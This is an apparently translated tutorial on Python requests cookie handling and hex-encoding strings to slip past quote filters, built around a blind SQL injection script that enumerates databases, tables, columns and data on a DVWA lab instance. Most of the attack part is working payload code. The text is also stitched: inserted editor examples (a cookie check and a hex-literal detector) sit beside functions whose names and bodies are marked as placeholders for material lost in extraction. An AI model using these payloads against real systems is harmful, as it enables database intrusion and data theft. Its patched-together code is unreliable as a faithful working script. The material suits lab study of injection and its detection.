This post uses Python 3's requests module to send and receive HTTP messages.
1. Cookie header with a single cookie: the cookie can be passed in through the headers parameter, for example:
```python
import requests

url = "http://192.168.101.16/pikachu/vul/sqli/sqli_blind_b.php"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
    "Cookie": "PHPSESSID=7qgjcq21lsq834acodn0mo7km3"
}
param = {
    "name": "lili",
    "submit": "查询",
}
response = requests.get(url, params=param, headers=headers)
```
With more than one cookie this method no longer works. For example, if the headers dict in the code above is written as
```python
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
    "Cookie": "PHPSESSID=7qgjcq21lsq834acodn0mo7km3; seurity=medium"
}
```
the script runs without raising an error, but if you add print(response.request.headers) you will see that the request headers do not carry the cookies we set (I forget whether there was no Cookie header at all or whether a fresh cookie was generated automatically >︿<).
For the multi-cookie case you need the cookies parameter:
```python
import requests

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
}
# A single cookie can go straight into headers; with two cookies use the dict-form cookies parameter
cookies = {"security": "medium", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}
param = {
    "id": "1",
    "Submit": "Submit",
}
response = requests.post(url, data=param, headers=headers, cookies=cookies)
```
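The check a practitioner wants here is to look at the Cookie header before anything is sent, rather than after the fact via response.request.headers. The following is an added example, not code from the original post: it builds the same POST with requests.Request(...).prepare(), which assembles the exact headers that would go on the wire without opening a connection, and reads back the Cookie header that the cookies= dict produced. The URL is the post's DVWA address; the session id and User-Agent are constructed placeholders.

```python
import requests

# Constructed values for illustration; the session id is not a real one.
URL = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/"
HEADERS = {"User-Agent": "Mozilla/5.0 (example)"}
COOKIES = {"security": "medium", "PHPSESSID": "EXAMPLE_SESSION_ID"}


def build_cookie_header(url, headers, cookies, data=None):
    """Prepare (but do not send) a POST that passes cookies through the
    cookies= parameter, and return the Cookie header requests generated."""
    req = requests.Request("POST", url, headers=headers, cookies=cookies, data=data)
    prepared = req.prepare()  # builds headers and body locally; no network activity
    return prepared.headers.get("Cookie")


def parse_cookie_header(value):
    """Turn 'a=1; b=2' back into a dict so checks do not depend on cookie order."""
    result = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            result[name] = val
    return result


if __name__ == "__main__":
    header = build_cookie_header(URL, HEADERS, COOKIES, data={"id": "1", "Submit": "Submit"})
    print("Cookie header on the wire:", header)
    print("Parsed back:", parse_cookie_header(header))
```

Both cookies end up in one Cookie header, separated by "; ", which is what the server-side cookie parser expects; inspecting the prepared request this way also avoids sending a request just to find out what was in it.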
2. Bypassing quote filtering
A string can be converted to its hexadecimal ASCII form to get past a quote filter; this needs the binascii module. The conversion takes just two steps:
```python
import binascii

table = 'USERS'
table = binascii.b2a_hex(table.encode())  # str -> bytes -> hex digits (as bytes), e.g. b'5553455253'
table = table.decode('ascii')             # hex digits as a str, ready to be used as 0x5553455253
```
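The defensive consequence of this trick is that filtering quotes does not stop string literals from reaching the query; only parameterized queries do. The following is an added example, not code from the original post, showing the detection side: it wraps the post's two-step conversion into a 0x literal, then scans a URL-encoded POST body the way a WAF rule or a log reviewer would, decoding any hex literal that yields printable ASCII so the smuggled string is visible. The sample body is constructed to match the shape of the post's column-enumeration payload and is not captured traffic.

```python
import binascii
import re
from urllib.parse import parse_qs


def to_hex_literal(text):
    """The post's two-step conversion (str -> bytes -> hex text), wrapped as a
    MySQL-style 0x literal so it can be round-tripped by the scanner below."""
    return "0x" + binascii.b2a_hex(text.encode()).decode("ascii")


# 0x followed by at least four hex digits: short numeric literals are common in
# legitimate input, while a smuggled string is rarely shorter than two bytes.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{4,})\b")


def decode_hex_literals(value):
    """Return [(literal, decoded_text)] for every even-length hex literal in
    value that decodes to printable ASCII, i.e. a string that a quote filter
    would never have seen as a string."""
    hits = []
    for m in HEX_LITERAL.finditer(value):
        digits = m.group(1)
        if len(digits) % 2:  # an odd digit count cannot be a byte string
            continue
        raw = bytes.fromhex(digits)
        if all(32 <= b < 127 for b in raw):
            hits.append((m.group(0), raw.decode("ascii")))
    return hits


def scan_form_body(body):
    """Scan a URL-encoded POST body and report decoded hex literals per
    parameter name; an empty dict means nothing suspicious was found."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = decode_hex_literals(value)
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


# Constructed sample body shaped like the post's column-enumeration payload.
SAMPLE_BODY = (
    "id=1+and+%28length%28%28select+group_concat%28column_name%29+from+"
    "information_schema.columns+where+table_name+%3D+0x5553455253%29%29%29"
    "%3E8--+ss&Submit=Submit"
)

if __name__ == "__main__":
    print(to_hex_literal("USERS"))  # 0x5553455253
    for name, hits in scan_form_body(SAMPLE_BODY).items():
        for literal, text in hits:
            print(f"parameter {name}: {literal} decodes to {text!r}")
```

Random-looking hex such as 0xdeadbeef is deliberately left alone because it does not decode to printable text; the rule is meant to surface readable identifiers and values, which is what a quote-filter bypass carries.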
Take the medium level of DVWA's SQL Injection (Blind) challenge as an example: this level filters quotes, and every page in DVWA carries at least two cookie values.
The following code performs the database enumeration for this challenge (do not reproduce or quote without permission, although probably nobody would want to anyway).
```python
#!/usr/bin/python3
# coding=utf-8
"""
functions for boolean-based sql injection(POST,with Single quotes filtering bypass)
:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
import requests
import binascii

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/"  # URL of the vulnerable page; fill in for your own setup
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
}  # HTTP request headers; fill in for your own setup
# A single cookie can go straight into headers; with two cookies use the dict-form cookies parameter
cookies = {"security": "medium", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}
keylist = [hex(i) for i in range(33, 127)]  # hex ASCII: digits, upper/lower-case letters, printable punctuation
flag = 'User ID exists in the database'  # text that shows the injected condition was true; take it from the page's response


def CurrentDatabasePOST():
    n = 10  # guessed upper bound on the length of the current database name; adjust as needed
    k = 0
    j = n // 2
    length = 0
    db = str()
    while True:
        # Binary search on the name length: k is the largest length known to be
        # too small, n the current upper bound, j the value being probed.
        if j > k and j < n and n - k > 3:
            payload1 = "1 and length(database())>" + str(j) + "-- ss"  # all payloads are adjusted to the target
            param = {
                "id": payload1,
                "Submit": "Submit",
            }
            response = requests.post(url, data=param, headers=headers, cookies=cookies)  # POST the request carrying the payload
            # print(response.request.body)
            # print(response.request.headers)
            # print(response.text)
            if response.text.find(flag) != -1:
                k = j  # length is greater than j: raise the lower bound
            else:
                n = j  # length is at most j: lower the upper bound
            # Midpoint of the remaining range. The original computed (n-k)//2, which
            # falls below k after the first hit and only works by dropping into the scan below.
            j = k + (n - k) // 2
        elif j - k == 3 or j - k < 3:
            # Everything from here on in the original (the scan that pins down the exact
            # length, then the character-by-character recovery of the name into db using
            # keylist, payloads 2 and 3) was lost when this page was extracted and is not
            # reconstructed here.
            break


# The three functions below survive on the page only as their length-probing branch:
# their names, parameters and the remainder of their bodies were lost in extraction.
# The names and parameters used here are placeholders so the fragments parse; they
# are not the author's. The search logic is identical to CurrentDatabasePOST.

def TablesFragmentPOST():  # placeholder name; enumerates table names of the current database
    n, k, j = 10, 0, 5  # placeholder bounds, mirroring CurrentDatabasePOST
    while True:
        if j > k and j < n and n - k > 3:
            payload4 = "1 and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>" + str(j) + "-- ss"
            param = {
                "id": payload4,
                "Submit": "Submit",
            }
            response = requests.post(url, data=param, headers=headers, cookies=cookies)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = k + (n - k) // 2
        elif j - k == 3 or j - k < 3:
            break  # remainder (payloads 5 and 6) not on the page


def ColumnsFragmentPOST(table):  # placeholder name; table is the hex-encoded name from section 2, e.g. "5553455253"
    n, k, j = 10, 0, 5  # placeholder bounds
    while True:
        if j > k and j < n and n - k > 3:
            payload7 = "1 and (length((select group_concat(column_name) from information_schema.columns where table_name = 0x" + table + ")))>" + str(j) + "-- ss"
            param = {
                "id": payload7,
                "Submit": "Submit",
            }
            response = requests.post(url, data=param, headers=headers, cookies=cookies)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = k + (n - k) // 2
        elif j - k == 3 or j - k < 3:
            break  # remainder (payloads 8 and 9) not on the page


def DataFragmentPOST(table, col1, col2):  # placeholder name; plain table and column names, 0x5E is the "^" separator
    n, k, j = 10, 0, 5  # placeholder bounds
    while True:
        if j > k and j < n and n - k > 3:
            payload10 = "1 and (length((select group_concat(concat(" + col1 + ",0x5E," + col2 + ")) from " + table + ")))>" + str(j) + "-- ss"
            param = {
                "id": payload10,
                "Submit": "Submit",
            }
            response = requests.post(url, data=param, headers=headers, cookies=cookies)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = k + (n - k) // 2
        elif j - k == 3 or j - k < 3:
            break  # remainder (payloads 11 and 12) and the calling code not on the page
```